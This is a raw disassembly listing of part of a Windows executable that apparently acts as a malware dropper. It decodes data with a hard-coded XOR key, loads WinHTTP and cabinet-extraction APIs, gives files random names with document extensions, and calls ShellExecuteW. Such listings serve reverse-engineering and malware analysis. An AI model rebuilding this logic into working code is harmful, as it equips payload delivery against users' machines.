.text:004017A7 83 C0 F8 add eax, 0FFFFFFF8h
.text:004017AA 50 push eax ; nNumberOfBytesToWrite
.text:004017AB 83 C6 08 add esi, 8
.text:004017AE 56 push esi ; lpBuffer
.text:004017AF E8 FF 05 00 00 call sub_401DB3
.text:004017B4 59 pop ecx
.text:004017B5 59 pop ecx
.text:004017B6 E9 71 FF FF FF jmp loc_40172C
.text:004017B6 start endp
.text:004017B6
.text:004017BB
.text:004017BB ; =============== S U B R O U T I N E =======================================
.text:004017BB
.text:004017BB ; Attributes: bp-based frame
.text:004017BB
.text:004017BB sub_4017BB proc near ; CODE XREF: start+13Ep
.text:004017BB ; sub_401DB3+16p
.text:004017BB
.text:004017BB var_618 = byte ptr -618h
.text:004017BB var_410 = word ptr -410h
.text:004017BB var_208 = word ptr -208h
.text:004017BB var_1FC = word ptr -1FCh
.text:004017BB arg_0 = dword ptr 8
.text:004017BB arg_4 = dword ptr 0Ch
.text:004017BB arg_8 = dword ptr 10h
.text:004017BB
.text:004017BB 55 push ebp
.text:004017BC 8B EC mov ebp, esp
.text:004017BE 81 EC 18 06 00 00 sub esp, 618h
.text:004017C4 53 push ebx
.text:004017C5 56 push esi
.text:004017C6 57 push edi
.text:004017C7 68 DC 11 40 00 push offset aAeoiuy_ ; "aeoiuy."
.text:004017CC BE 04 01 00 00 mov esi, 104h
.text:004017D1 8D 85 F8 FD FF FF lea eax, [ebp+var_208]
.text:004017D7 56 push esi
.text:004017D8 50 push eax
.text:004017D9 FF 15 FC 1E 40 00 call dword_401EFC
.text:004017DF 68 EC 11 40 00 push offset aQwrtpsdfghjklz ; "qwrtpsdfghjklzxcvbnm"
.text:004017E4 8D 85 F0 FB FF FF lea eax, [ebp+var_410]
.text:004017EA 56 push esi
.text:004017EB 50 push eax
.text:004017EC FF 15 FC 1E 40 00 call dword_401EFC
.text:004017F2 68 18 12 40 00 push offset aTxtrtfdocchmhl ; "txtrtfdocchmhlpttfpdffb2xlspptmdbcdawav"...
.text:004017F7 8D 85 E8 F9 FF FF lea eax, [ebp+var_618]
.text:004017FD 56 push esi
.text:004017FE 50 push eax
.text:004017FF FF 15 FC 1E 40 00 call dword_401EFC
.text:00401805 8B 45 0C mov eax, [ebp+arg_4]
.text:00401808 6A 03 push 3
.text:0040180A E8 92 00 00 00 call sub_4018A1
.text:0040180F 8B F0 mov esi, eax
.text:00401811 33 FF xor edi, edi
.text:00401813 83 C4 28 add esp, 28h
.text:00401816 33 DB xor ebx, ebx
.text:00401818 3B F7 cmp esi, edi
.text:0040181A 7E 40 jle short loc_40185C
.text:0040181C
.text:0040181C loc_40181C: ; CODE XREF: sub_4017BB+9Fj
.text:0040181C 8B C3 mov eax, ebx
.text:0040181E 25 01 00 00 80 and eax, 80000001h
.text:00401823 79 05 jns short loc_40182A
.text:00401825 48 dec eax
.text:00401826 83 C8 FE or eax, 0FFFFFFFEh
.text:00401829 40 inc eax
.text:0040182A
.text:0040182A loc_40182A: ; CODE XREF: sub_4017BB+68j
.text:0040182A 57 push edi
.text:0040182B 74 12 jz short loc_40183F
.text:0040182D 6A 05 push 5
.text:0040182F 58 pop eax
.text:00401830 E8 6C 00 00 00 call sub_4018A1
.text:00401835 66 8B 84 45 F8 FD+ mov ax, [ebp+eax*2+var_208]
.text:0040183D EB 10 jmp short loc_40184F
.text:0040183F ; ---------------------------------------------------------------------------
.text:0040183F
.text:0040183F loc_40183F: ; CODE XREF: sub_4017BB+70j
.text:0040183F 6A 13 push 13h
.text:00401841 58 pop eax
.text:00401842 E8 5A 00 00 00 call sub_4018A1
.text:00401847 66 8B 84 45 F0 FB+ mov ax, [ebp+eax*2+var_410]
.text:0040184F
.text:0040184F loc_40184F: ; CODE XREF: sub_4017BB+82j
.text:0040184F 59 pop ecx
.text:00401850 8B 4D 08 mov ecx, [ebp+arg_0]
.text:00401853 66 89 04 59 mov [ecx+ebx*2], ax
.text:00401857 43 inc ebx
.text:00401858 3B DE cmp ebx, esi
.text:0040185A 7C C0 jl short loc_40181C
.text:0040185C
.text:0040185C loc_40185C: ; CODE XREF: sub_4017BB+5Fj
.text:0040185C 66 8B 85 04 FE FF+ mov ax, [ebp+var_1FC]
.text:00401863 8B 75 08 mov esi, [ebp+arg_0]
.text:00401866 66 89 04 5E mov [esi+ebx*2], ax
.text:0040186A 43 inc ebx
.text:0040186B 83 7D 10 01 cmp [ebp+arg_8], 1
.text:0040186F 75 05 jnz short loc_401876
.text:00401871 6A 69 push 69h
.text:00401873 58 pop eax
.text:00401874 EB 0D jmp short loc_401883
.text:00401876 ; ---------------------------------------------------------------------------
.text:00401876
.text:00401876 loc_401876: ; CODE XREF: sub_4017BB+B4j
.text:00401876 57 push edi
.text:00401877 6A 22 push 22h
.text:00401879 58 pop eax
.text:0040187A E8 22 00 00 00 call sub_4018A1
.text:0040187F 6B C0 03 imul eax, 3
.text:00401882 59 pop ecx
.text:00401883
.text:00401883 loc_401883: ; CODE XREF: sub_4017BB+B9j
.text:00401883 8B 4D 08 mov ecx, [ebp+arg_0]
.text:00401886 8D 3C 5E lea edi, [esi+ebx*2]
.text:00401889 8D B4 45 E8 F9 FF+ lea esi, [ebp+eax*2+var_618]
.text:00401890 A5 movsd
.text:00401891 66 A5 movsw
.text:00401893 83 C3 03 add ebx, 3
.text:00401896 5F pop edi
.text:00401897 33 C0 xor eax, eax
.text:00401899 5E pop esi
.text:0040189A 66 89 04 59 mov [ecx+ebx*2], ax
.text:0040189E 5B pop ebx
.text:0040189F C9 leave
.text:004018A0 C3 retn
.text:004018A0 sub_4017BB endp
.text:004018A0
.text:004018A1
.text:004018A1 ; =============== S U B R O U T I N E =======================================
.text:004018A1
.text:004018A1 ; Attributes: bp-based frame
.text:004018A1
.text:004018A1 sub_4018A1 proc near ; CODE XREF: start+25Dp
.text:004018A1 ; sub_4017BB+4Fp ...
.text:004018A1
.text:004018A1 var_4 = dword ptr -4
.text:004018A1 arg_0 = dword ptr 8
.text:004018A1
.text:004018A1 55 push ebp
.text:004018A2 8B EC mov ebp, esp
.text:004018A4 51 push ecx
.text:004018A5 56 push esi
.text:004018A6 8B F0 mov esi, eax
.text:004018A8 6A 04 push 4
.text:004018AA 8D 45 FC lea eax, [ebp+var_4]
.text:004018AD 50 push eax
.text:004018AE FF 15 04 1F 40 00 call dword_401F04
.text:004018B4 2B 75 08 sub esi, [ebp+arg_0]
.text:004018B7 8B 45 FC mov eax, [ebp+var_4]
.text:004018BA 46 inc esi
.text:004018BB 33 D2 xor edx, edx
.text:004018BD F7 F6 div esi
.text:004018BF 5E pop esi
.text:004018C0 8B C2 mov eax, edx
.text:004018C2 03 45 08 add eax, [ebp+arg_0]
.text:004018C5 C9 leave
.text:004018C6 C3 retn
.text:004018C6 sub_4018A1 endp
.text:004018C6
.text:004018C7
.text:004018C7 ; =============== S U B R O U T I N E =======================================
.text:004018C7
.text:004018C7
.text:004018C7 sub_4018C7 proc near ; CODE XREF: start+290p
.text:004018C7 81 F9 00 04 00 00 cmp ecx, 400h
.text:004018CD 73 03 jnb short loc_4018D2
.text:004018CF 33 C0 xor eax, eax
.text:004018D1 C3 retn
.text:004018D2 ; ---------------------------------------------------------------------------
.text:004018D2
.text:004018D2 loc_4018D2: ; CODE XREF: sub_4018C7+6j
.text:004018D2 53 push ebx
.text:004018D3 8B 18 mov ebx, [eax]
.text:004018D5 56 push esi
.text:004018D6 8B 70 04 mov esi, [eax+4]
.text:004018D9 83 C1 F8 add ecx, 0FFFFFFF8h
.text:004018DC 3B F1 cmp esi, ecx
.text:004018DE 74 04 jz short loc_4018E4
.text:004018E0 33 C0 xor eax, eax
.text:004018E2 EB 1D jmp short loc_401901
.text:004018E4 ; ---------------------------------------------------------------------------
.text:004018E4
.text:004018E4 loc_4018E4: ; CODE XREF: sub_4018C7+17j
.text:004018E4 57 push edi
.text:004018E5 8D 78 08 lea edi, [eax+8]
.text:004018E8 56 push esi
.text:004018E9 57 push edi
.text:004018EA E8 15 00 00 00 call sub_401904
.text:004018EF 56 push esi
.text:004018F0 57 push edi
.text:004018F1 E8 8A 05 00 00 call sub_401E80
.text:004018F6 2B C3 sub eax, ebx
.text:004018F8 83 C4 10 add esp, 10h
.text:004018FB F7 D8 neg eax
.text:004018FD 1B C0 sbb eax, eax
.text:004018FF 40 inc eax
.text:00401900 5F pop edi
.text:00401901
.text:00401901 loc_401901: ; CODE XREF: sub_4018C7+1Bj
.text:00401901 5E pop esi
.text:00401902 5B pop ebx
.text:00401903 C3 retn
.text:00401903 sub_4018C7 endp
.text:00401903
.text:00401904
.text:00401904 ; =============== S U B R O U T I N E =======================================
.text:00401904
.text:00401904 ; Attributes: bp-based frame
.text:00401904
.text:00401904 sub_401904 proc near ; CODE XREF: sub_4018C7+23p
.text:00401904
.text:00401904 var_10 = byte ptr -10h
.text:00401904 var_F = byte ptr -0Fh
.text:00401904 var_E = byte ptr -0Eh
.text:00401904 var_D = byte ptr -0Dh
.text:00401904 var_C = byte ptr -0Ch
.text:00401904 var_B = byte ptr -0Bh
.text:00401904 var_A = byte ptr -0Ah
.text:00401904 var_9 = byte ptr -9
.text:00401904 var_8 = byte ptr -8
.text:00401904 var_7 = byte ptr -7
.text:00401904 var_6 = byte ptr -6
.text:00401904 var_5 = byte ptr -5
.text:00401904 var_4 = byte ptr -4
.text:00401904 var_3 = byte ptr -3
.text:00401904 var_2 = byte ptr -2
.text:00401904 var_1 = byte ptr -1
.text:00401904 arg_0 = dword ptr 8
.text:00401904 arg_4 = dword ptr 0Ch
.text:00401904
.text:00401904 55 push ebp
.text:00401905 8B EC mov ebp, esp
.text:00401907 83 EC 10 sub esp, 10h
.text:0040190A 53 push ebx
.text:0040190B 57 push edi
.text:0040190C 33 DB xor ebx, ebx
.text:0040190E 33 FF xor edi, edi
.text:00401910 C6 45 F0 80 mov [ebp+var_10], 80h
.text:00401914 C6 45 F1 3B mov [ebp+var_F], 3Bh
.text:00401918 C6 45 F2 D3 mov [ebp+var_E], 0D3h
.text:0040191C C6 45 F3 23 mov [ebp+var_D], 23h
.text:00401920 C6 45 F4 9C mov [ebp+var_C], 9Ch
.text:00401924 C6 45 F5 E5 mov [ebp+var_B], 0E5h
.text:00401928 C6 45 F6 1A mov [ebp+var_A], 1Ah
.text:0040192C C6 45 F7 BA mov [ebp+var_9], 0BAh
.text:00401930 C6 45 F8 D2 mov [ebp+var_8], 0D2h
.text:00401934 C6 45 F9 93 mov [ebp+var_7], 93h
.text:00401938 C6 45 FA 64 mov [ebp+var_6], 64h
.text:0040193C C6 45 FB 21 mov [ebp+var_5], 21h
.text:00401940 C6 45 FC 0B mov [ebp+var_4], 0Bh
.text:00401944 C6 45 FD D6 mov [ebp+var_3], 0D6h
.text:00401948 C6 45 FE 0B mov [ebp+var_2], 0Bh
.text:0040194C C6 45 FF 19 mov [ebp+var_1], 19h
.text:00401950 39 5D 0C cmp [ebp+arg_4], ebx
.text:00401953 76 26 jbe short loc_40197B
.text:00401955 56 push esi
.text:00401956
.text:00401956 loc_401956: ; CODE XREF: sub_401904+74j
.text:00401956 8B 45 08 mov eax, [ebp+arg_0]
.text:00401959 8D 34 03 lea esi, [ebx+eax]
.text:0040195C 8A 0E mov cl, [esi]
.text:0040195E 8D 54 3D F0 lea edx, [ebp+edi+var_10]
.text:00401962 8A 02 mov al, [edx]
.text:00401964 32 C8 xor cl, al
.text:00401966 32 C1 xor al, cl
.text:00401968 47 inc edi
.text:00401969 88 0E mov [esi], cl
.text:0040196B 88 02 mov [edx], al
.text:0040196D 83 FF 10 cmp edi, 10h
.text:00401970 75 02 jnz short loc_401974
.text:00401972 33 FF xor edi, edi
.text:00401974
.text:00401974 loc_401974: ; CODE XREF: sub_401904+6Cj
.text:00401974 43 inc ebx
.text:00401975 3B 5D 0C cmp ebx, [ebp+arg_4]
.text:00401978 72 DC jb short loc_401956
.text:0040197A 5E pop esi
.text:0040197B
.text:0040197B loc_40197B: ; CODE XREF: sub_401904+4Fj
.text:0040197B 5F pop edi
.text:0040197C 5B pop ebx
.text:0040197D C9 leave
.text:0040197E C3 retn
.text:0040197E sub_401904 endp
.text:0040197E
.text:0040197F
.text:0040197F ; =============== S U B R O U T I N E =======================================
.text:0040197F
.text:0040197F ; Attributes: noreturn bp-based frame
.text:0040197F
.text:0040197F sub_40197F proc near ; CODE XREF: start:loc_4015C4p
.text:0040197F ; sub_4019C4:loc_401A0Ap ...
.text:0040197F
.text:0040197F Text = byte ptr -104h
.text:0040197F arg_0 = dword ptr 8
.text:0040197F
.text:0040197F 55 push ebp
.text:00401980 8B EC mov ebp, esp
.text:00401982 81 EC 04 01 00 00 sub esp, 104h
.text:00401988 FF 75 08 push [ebp+arg_0]
.text:0040198B 8D 85 FC FE FF FF lea eax, [ebp+Text]
.text:00401991 68 F8 12 40 00 push offset aErrorCodeD ; "Error code #%d"
.text:00401996 68 04 01 00 00 push 104h
.text:0040199B 50 push eax
.text:0040199C FF 15 E8 1E 40 00 call dword_401EE8
.text:004019A2 83 C4 10 add esp, 10h
.text:004019A5 6A 10 push 10h ; uType
.text:004019A7 68 08 13 40 00 push offset Caption ; "Error"
.text:004019AC 8D 85 FC FE FF FF lea eax, [ebp+Text]
.text:004019B2 50 push eax ; lpText
.text:004019B3 6A 00 push 0 ; hWnd
.text:004019B5 FF 15 54 10 40 00 call MessageBoxA
.text:004019BB 6A 00 push 0 ; uExitCode
.text:004019BD FF 15 00 10 40 00 call ExitProcess
.text:004019BD sub_40197F endp
.text:004019BD
.text:004019BD ; ---------------------------------------------------------------------------
.text:004019C3 CC align 4
.text:004019C4
.text:004019C4 ; =============== S U B R O U T I N E =======================================
.text:004019C4
.text:004019C4
.text:004019C4 sub_4019C4 proc near ; CODE XREF: start+5Ap
.text:004019C4
.text:004019C4 hModule = dword ptr -8
.text:004019C4 var_4 = dword ptr -4
.text:004019C4
.text:004019C4 51 push ecx
.text:004019C5 51 push ecx
.text:004019C6 53 push ebx
.text:004019C7 55 push ebp
.text:004019C8 56 push esi
.text:004019C9 8B 35 38 10 40 00 mov esi, LoadLibraryA
.text:004019CF 57 push edi
.text:004019D0 68 10 13 40 00 push offset LibFileName ; "SHLWAPI.DLL"
.text:004019D5 FF D6 call esi ; LoadLibraryA
.text:004019D7 68 1C 13 40 00 push offset aSetupapi_dll ; "SETUPAPI.DLL"
.text:004019DC 8B D8 mov ebx, eax
.text:004019DE FF D6 call esi ; LoadLibraryA
.text:004019E0 68 2C 13 40 00 push offset aShell32_dll ; "SHELL32.DLL"
.text:004019E5 8B E8 mov ebp, eax
.text:004019E7 FF D6 call esi ; LoadLibraryA
.text:004019E9 68 38 13 40 00 push offset aWinhttp_dll ; "WINHTTP.DLL"
.text:004019EE 89 44 24 14 mov [esp+1Ch+hModule], eax
.text:004019F2 FF D6 call esi ; LoadLibraryA
.text:004019F4 68 44 13 40 00 push offset aAdvapi32_dll ; "ADVAPI32.DLL"
.text:004019F9 8B F8 mov edi, eax
.text:004019FB FF D6 call esi ; LoadLibraryA
.text:004019FD 89 44 24 14 mov [esp+18h+var_4], eax
.text:00401A01 85 DB test ebx, ebx
.text:00401A03 75 0A jnz short loc_401A0F
.text:00401A05 68 B9 0B 00 00 push 0BB9h
.text:00401A0A
.text:00401A0A loc_401A0A: ; CODE XREF: sub_4019C4+54j
.text:00401A0A ; sub_4019C4+62j ...
.text:00401A0A E8 70 FF FF FF call sub_40197F
.text:00401A0F ; ---------------------------------------------------------------------------
.text:00401A0F
.text:00401A0F loc_401A0F: ; CODE XREF: sub_4019C4+3Fj
.text:00401A0F 85 ED test ebp, ebp
.text:00401A11 75 07 jnz short loc_401A1A
.text:00401A13 68 BA 0B 00 00 push 0BBAh
.text:00401A18 EB F0 jmp short loc_401A0A
.text:00401A1A ; ---------------------------------------------------------------------------
.text:00401A1A
.text:00401A1A loc_401A1A: ; CODE XREF: sub_4019C4+4Dj
.text:00401A1A 83 7C 24 10 00 cmp [esp+18h+hModule], 0
.text:00401A1F 75 07 jnz short loc_401A28
.text:00401A21 68 BB 0B 00 00 push 0BBBh
.text:00401A26 EB E2 jmp short loc_401A0A
.text:00401A28 ; ---------------------------------------------------------------------------
.text:00401A28
.text:00401A28 loc_401A28: ; CODE XREF: sub_4019C4+5Bj
.text:00401A28 85 FF test edi, edi
.text:00401A2A 75 07 jnz short loc_401A33
.text:00401A2C 68 BC 0B 00 00 push 0BBCh
.text:00401A31 EB D7 jmp short loc_401A0A
.text:00401A33 ; ---------------------------------------------------------------------------
.text:00401A33
.text:00401A33 loc_401A33: ; CODE XREF: sub_4019C4+66j
.text:00401A33 8B 35 30 10 40 00 mov esi, GetProcAddress
.text:00401A39 68 54 13 40 00 push offset ProcName ; "wnsprintfA"
.text:00401A3E 53 push ebx ; hModule
.text:00401A3F FF D6 call esi ; GetProcAddress
.text:00401A41 68 60 13 40 00 push offset aWnsprintfw ; "wnsprintfW"
.text:00401A46 53 push ebx ; hModule
.text:00401A47 A3 E8 1E 40 00 mov dword_401EE8, eax
.text:00401A4C FF D6 call esi ; GetProcAddress
.text:00401A4E 68 6C 13 40 00 push offset aSetupiterateca ; "SetupIterateCabinetW"
.text:00401A53 55 push ebp ; hModule
.text:00401A54 A3 FC 1E 40 00 mov dword_401EFC, eax
.text:00401A59 FF D6 call esi ; GetProcAddress
.text:00401A5B 68 84 13 40 00 push offset aShellexecutew ; "ShellExecuteW"
.text:00401A60 FF 74 24 14 push [esp+1Ch+hModule] ; hModule
.text:00401A64 A3 F0 1E 40 00 mov dword_401EF0, eax
.text:00401A69 FF D6 call esi ; GetProcAddress
.text:00401A6B 68 94 13 40 00 push offset aStrstriw ; "StrStrIW"
.text:00401A70 53 push ebx ; hModule
.text:00401A71 A3 DC 1E 40 00 mov dword_401EDC, eax
.text:00401A76 FF D6 call esi ; GetProcAddress
.text:00401A78 68 A0 13 40 00 push offset aSystemfunction ; "SystemFunction036"
.text:00401A7D FF 74 24 18 push [esp+1Ch+var_4] ; hModule
.text:00401A81 A3 F4 1E 40 00 mov dword_401EF4, eax
.text:00401A86 FF D6 call esi ; GetProcAddress
.text:00401A88 68 B4 13 40 00 push offset aWinhttpqueryda ; "WinHttpQueryDataAvailable"
.text:00401A8D 57 push edi ; hModule
.text:00401A8E A3 04 1F 40 00 mov dword_401F04, eax
.text:00401A93 FF D6 call esi ; GetProcAddress
.text:00401A95 68 D0 13 40 00 push offset aWinhttpreceive ; "WinHttpReceiveResponse"
.text:00401A9A 57 push edi ; hModule
.text:00401A9B A3 14 1F 40 00 mov dword_401F14, eax
.text:00401AA0 FF D6 call esi ; GetProcAddress
.text:00401AA2 68 E8 13 40 00 push offset aWinhttpsendreq ; "WinHttpSendRequest"
.text:00401AA7 57 push edi ; hModule
.text:00401AA8 A3 08 1F 40 00 mov dword_401F08, eax
.text:00401AAD FF D6 call esi ; GetProcAddress
.text:00401AAF 68 FC 13 40 00 push offset aWinhttpsetopti ; "WinHttpSetOption"
.text:00401AB4 57 push edi ; hModule
.text:00401AB5 A3 E4 1E 40 00 mov dword_401EE4, eax
.text:00401ABA FF D6 call esi ; GetProcAddress
.text:00401ABC 68 10 14 40 00 push offset aWinhttpopenreq ; "WinHttpOpenRequest"
.text:00401AC1 57 push edi ; hModule
.text:00401AC2 A3 18 1F 40 00 mov dword_401F18, eax
.text:00401AC7 FF D6 call esi ; GetProcAddress
.text:00401AC9 68 24 14 40 00 push offset aWinhttpconnect ; "WinHttpConnect"
.text:00401ACE 57 push edi ; hModule
.text:00401ACF A3 00 1F 40 00 mov dword_401F00, eax
.text:00401AD4 FF D6 call esi ; GetProcAddress
.text:00401AD6 68 34 14 40 00 push offset aWinhttpopen ; "WinHttpOpen"
.text:00401ADB 57 push edi ; hModule
.text:00401ADC A3 0C 1F 40 00 mov dword_401F0C, eax
.text:00401AE1 FF D6 call esi ; GetProcAddress
.text:00401AE3 68 40 14 40 00 push offset aWinhttpreaddat ; "WinHttpReadData"
.text:00401AE8 57 push edi ; hModule
.text:00401AE9 A3 E0 1E 40 00 mov dword_401EE0, eax
.text:00401AEE FF D6 call esi ; GetProcAddress
.text:00401AF0 5F pop edi
.text:00401AF1 5E pop esi
.text:00401AF2 5D pop ebp
.text:00401AF3 A3 10 1F 40 00 mov dword_401F10, eax
.text:00401AF8 5B pop ebx
.text:00401AF9 59 pop ecx
.text:00401AFA 59 pop ecx
.text:00401AFB C3 retn
.text:00401AFB sub_4019C4 endp
.text:00401AFB
.text:00401AFC
.text:00401AFC ; =============== S U B R O U T I N E =======================================
.text:00401AFC
.text:00401AFC ; Attributes: bp-based frame
.text:00401AFC
.text:00401AFC sub_401AFC proc near ; DATA XREF: start+200o
.text:00401AFC
.text:00401AFC var_400 = word ptr -400h
.text:00401AFC var_3FE = word ptr -3FEh
.text:00401AFC var_3FC = word ptr -3FCh
.text:00401AFC var_3FA = word ptr -3FAh
.text:00401AFC arg_4 = dword ptr 0Ch
.text:00401AFC arg_8 = dword ptr 10h
.text:00401AFC
.text:00401AFC 55 push ebp
.text:00401AFD 8B EC mov ebp, esp
.text:00401AFF 8B 4D 0C mov ecx, [ebp+arg_4]
.text:00401B02 81 EC 00 04 00 00 sub esp, 400h
.text:00401B08 33 C0 xor eax, eax
.text:00401B0A 83 E9 11 sub ecx, 11h
.text:00401B0D 74 11 jz short loc_401B20
.text:00401B0F 49 dec ecx
.text:00401B10 74 07 jz short loc_401B19
.text:00401B12 49 dec ecx
.text:00401B13 0F 85 9A 00 00 00 jnz locret_401BB3
.text:00401B19
.text:00401B19 loc_401B19: ; CODE XREF: sub_401AFC+14j
.text:00401B19 33 C0 xor eax, eax
.text:00401B1B E9 93 00 00 00 jmp locret_401BB3
.text:00401B20 ; ---------------------------------------------------------------------------
.text:00401B20
.text:00401B20 loc_401B20: ; CODE XREF: sub_401AFC+11j
.text:00401B20 56 push esi
.text:00401B21 57 push edi
.text:00401B22 8B 7D 10 mov edi, [ebp+arg_8]
.text:00401B25 FF 37 push dword ptr [edi] ; lpString
.text:00401B27 FF 15 24 10 40 00 call lstrlenW
.text:00401B2D 83 F8 04 cmp eax, 4
.text:00401B30 7D 0A jge short loc_401B3C
.text:00401B32 68 6C 09 00 00 push 96Ch
.text:00401B37 E8 43 FE FF FF call sub_40197F
.text:00401B3C ; ---------------------------------------------------------------------------
.text:00401B3C
.text:00401B3C loc_401B3C: ; CODE XREF: sub_401AFC+34j
.text:00401B3C 8B 0F mov ecx, [edi]
.text:00401B3E 66 8B 54 41 FA mov dx, [ecx+eax*2-6]
.text:00401B43 66 89 95 00 FC FF+ mov [ebp+var_400], dx
.text:00401B4A 66 8B 54 41 FC mov dx, [ecx+eax*2-4]
.text:00401B4F 66 89 95 02 FC FF+ mov [ebp+var_3FE], dx
.text:00401B56 66 8B 44 41 FE mov ax, [ecx+eax*2-2]
.text:00401B5B 66 89 85 04 FC FF+ mov [ebp+var_3FC], ax
.text:00401B62 33 C0 xor eax, eax
.text:00401B64 66 89 85 06 FC FF+ mov [ebp+var_3FA], ax
.text:00401B6B 8D 85 00 FC FF FF lea eax, [ebp+var_400]
.text:00401B71 50 push eax
.text:00401B72 FF 35 F8 1E 40 00 push dword_401EF8
.text:00401B78 BE 00 02 00 00 mov esi, 200h
.text:00401B7D FF 35 D8 1E 40 00 push lpBuffer
.text:00401B83 68 50 14 40 00 push offset aSS_S ; "%s%s.%s"
.text:00401B88 56 push esi
.text:00401B89 FF 35 EC 1E 40 00 push dword_401EEC
.text:00401B8F FF 15 FC 1E 40 00 call dword_401EFC
.text:00401B95 FF 35 EC 1E 40 00 push dword_401EEC
.text:00401B9B 83 C7 12 add edi, 12h
.text:00401B9E 68 60 14 40 00 push offset aS ; "%s"
.text:00401BA3 56 push esi
.text:00401BA4 57 push edi
.text:00401BA5 FF 15 FC 1E 40 00 call dword_401EFC
.text:00401BAB 83 C4 28 add esp, 28h
.text:00401BAE 33 C0 xor eax, eax
.text:00401BB0 5F pop edi
.text:00401BB1 40 inc eax
.text:00401BB2 5E pop esi
.text:00401BB3
.text:00401BB3 locret_401BB3: ; CODE XREF: sub_401AFC+17j
.text:00401BB3 ; sub_401AFC+1Fj
.text:00401BB3 C9 leave
.text:00401BB4 C2 10 00 retn 10h
.text:00401BB4 sub_401AFC endp
.text:00401BB4
.text:00401BB7
.text:00401BB7 ; =============== S U B R O U T I N E =======================================
.text:00401BB7
.text:00401BB7
.text:00401BB7 sub_401BB7 proc near ; CODE XREF: start+1ECp
.text:00401BB7 53 push ebx
.text:00401BB8 56 push esi
.text:00401BB9 8B 35 F8 1E 40 00 mov esi, dword_401EF8
.text:00401BBF 8B D8 mov ebx, eax
.text:00401BC1 33 C0 xor eax, eax
.text:00401BC3 57 push edi
.text:00401BC4 8B D1 mov edx, ecx
.text:00401BC6 85 C9 test ecx, ecx
.text:00401BC8 7E 0F jle short loc_401BD9
.text:00401BCA
.text:00401BCA loc_401BCA: ; CODE XREF: sub_401BB7+1Dj
.text:00401BCA 66 83 3C 53 5C cmp word ptr [ebx+edx*2], 5Ch
.text:00401BCF 74 07 jz short loc_401BD8
.text:00401BD1 4A dec edx
.text:00401BD2 85 D2 test edx, edx
.text:00401BD4 7F F4 jg short loc_401BCA
.text:00401BD6 EB 01 jmp short loc_401BD9
.text:00401BD8 ; ---------------------------------------------------------------------------
.text:00401BD8
.text:00401BD8 loc_401BD8: ; CODE XREF: sub_401BB7+18j
.text:00401BD8 42 inc edx
.text:00401BD9
.text:00401BD9 loc_401BD9: ; CODE XREF: sub_401BB7+11j
.text:00401BD9 ; sub_401BB7+1Fj
.text:00401BD9 2B CA sub ecx, edx
.text:00401BDB 8D 79 FC lea edi, [ecx-4]
.text:00401BDE 83 FF 01 cmp edi, 1
.text:00401BE1 7D 04 jge short loc_401BE7
.text:00401BE3 33 C0 xor eax, eax
.text:00401BE5 EB 22 jmp short loc_401C09
.text:00401BE7 ; ---------------------------------------------------------------------------
.text:00401BE7
.text:00401BE7 loc_401BE7: ; CODE XREF: sub_401BB7+2Aj
.text:00401BE7 33 C9 xor ecx, ecx
.text:00401BE9 85 FF test edi, edi
.text:00401BEB 7E 1C jle short loc_401C09
.text:00401BED 8D 14 53 lea edx, [ebx+edx*2]
.text:00401BF0
.text:00401BF0 loc_401BF0: ; CODE XREF: sub_401BB7+45j
.text:00401BF0 66 8B 1A mov bx, [edx]
.text:00401BF3 66 89 1C 4E mov [esi+ecx*2], bx
.text:00401BF7 41 inc ecx
.text:00401BF8 42 inc edx
.text:00401BF9 42 inc edx
.text:00401BFA 3B CF cmp ecx, edi
.text:00401BFC 7C F2 jl short loc_401BF0
.text:00401BFE 85 C9 test ecx, ecx
.text:00401C00 7E 07 jle short loc_401C09
.text:00401C02 33 C0 xor eax, eax
.text:00401C04 66 89 04 4E mov [esi+ecx*2], ax
.text:00401C08 40 inc eax
.text:00401C09
.text:00401C09 loc_401C09: ; CODE XREF: sub_401BB7+2Ej
.text:00401C09 ; sub_401BB7+34j ...
.text:00401C09 5F pop edi
.text:00401C0A 5E pop esi
.text:00401C0B 5B pop ebx
.text:00401C0C C3 retn
.text:00401C0C sub_401BB7 endp
.text:00401C0C
.text:00401C0D
.text:00401C0D ; =============== S U B R O U T I N E =======================================
.text:00401C0D
.text:00401C0D ; Attributes: bp-based frame
.text:00401C0D
.text:00401C0D ; int __cdecl sub_401C0D(LPCWSTR lpString, int)
.text:00401C0D sub_401C0D proc near ; CODE XREF: start+280p
.text:00401C0D
.text:00401C0D String = word ptr -42Ch
.text:00401C0D var_224 = word ptr -224h
.text:00401C0D var_1C = dword ptr -1Ch
.text:00401C0D var_18 = dword ptr -18h
.text:00401C0D var_14 = dword ptr -14h
.text:00401C0D var_10 = dword ptr -10h
.text:00401C0D var_C = dword ptr -0Ch
.text:00401C0D var_8 = dword ptr -8
.text:00401C0D lpAddress = dword ptr -4
.text:00401C0D lpString = dword ptr 8
.text:00401C0D arg_4 = dword ptr 0Ch
.text:00401C0D
.text:00401C0D 55 push ebp
.text:00401C0E 8B EC mov ebp, esp
.text:00401C10 81 EC 2C 04 00 00 sub esp, 42Ch
.text:00401C16 53 push ebx
.text:00401C17 56 push esi
.text:00401C18 57 push edi
.text:00401C19 68 68 14 40 00 push offset asc_401468 ; "/"
.text:00401C1E FF 75 08 push [ebp+lpString]
.text:00401C21 FF 15 F4 1E 40 00 call dword_401EF4
.text:00401C27 50 push eax
.text:00401C28 BF 60 14 40 00 mov edi, offset aS ; "%s"
.text:00401C2D 57 push edi
.text:00401C2E BE 04 01 00 00 mov esi, 104h
.text:00401C33 8D 85 D4 FB FF FF lea eax, [ebp+String]
.text:00401C39 56 push esi
.text:00401C3A 50 push eax
.text:00401C3B FF 15 FC 1E 40 00 call dword_401EFC
.text:00401C41 FF 75 08 push [ebp+lpString]
.text:00401C44 8D 85 DC FD FF FF lea eax, [ebp+var_224]
.text:00401C4A 57 push edi
.text:00401C4B 56 push esi
.text:00401C4C 50 push eax
.text:00401C4D FF 15 FC 1E 40 00 call dword_401EFC
.text:00401C53 8B 35 24 10 40 00 mov esi, lstrlenW
.text:00401C59 83 C4 20 add esp, 20h
.text:00401C5C FF 75 08 push [ebp+lpString] ; lpString
.text:00401C5F FF D6 call esi ; lstrlenW
.text:00401C61 8B F8 mov edi, eax
.text:00401C63 8D 85 D4 FB FF FF lea eax, [ebp+String]
.text:00401C69 50 push eax ; lpString
.text:00401C6A FF D6 call esi ; lstrlenW
.text:00401C6C 33 F6 xor esi, esi
.text:00401C6E 56 push esi
.text:00401C6F 56 push esi
.text:00401C70 56 push esi
.text:00401C71 2B F8 sub edi, eax
.text:00401C73 56 push esi
.text:00401C74 33 C0 xor eax, eax
